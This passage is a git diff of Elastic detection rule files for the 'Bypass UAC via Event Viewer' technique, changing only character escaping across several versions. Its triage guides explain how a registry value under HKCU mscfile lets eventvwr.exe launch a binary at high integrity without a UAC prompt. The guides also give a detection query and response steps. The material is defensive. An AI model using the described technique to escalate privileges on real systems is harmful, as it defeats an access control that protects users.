Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n",
 "related_integrations": [
 {
@@ -50,7 +50,7 @@
 ],
 "risk_score": 73,
 "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_107.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_107.json
index 1e7f0ce6a01..7d89660595e 100644
--- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_107.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Bypass UAC via Event Viewer",
- "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0.
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n",
 "related_integrations": [
 {
@@ -50,7 +50,7 @@
 ],
 "risk_score": 73,
 "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_108.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_108.json
index 74a6dfd05a1..1b7df36faee 100644
--- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_108.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Bypass UAC via Event Viewer",
- "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes.
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0.
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n",
 "related_integrations": [
 {
@@ -50,7 +50,7 @@
 ],
 "risk_score": 73,
 "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_109.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_109.json
index 93b0d25f01b..06c4a728b79 100644
--- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_109.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
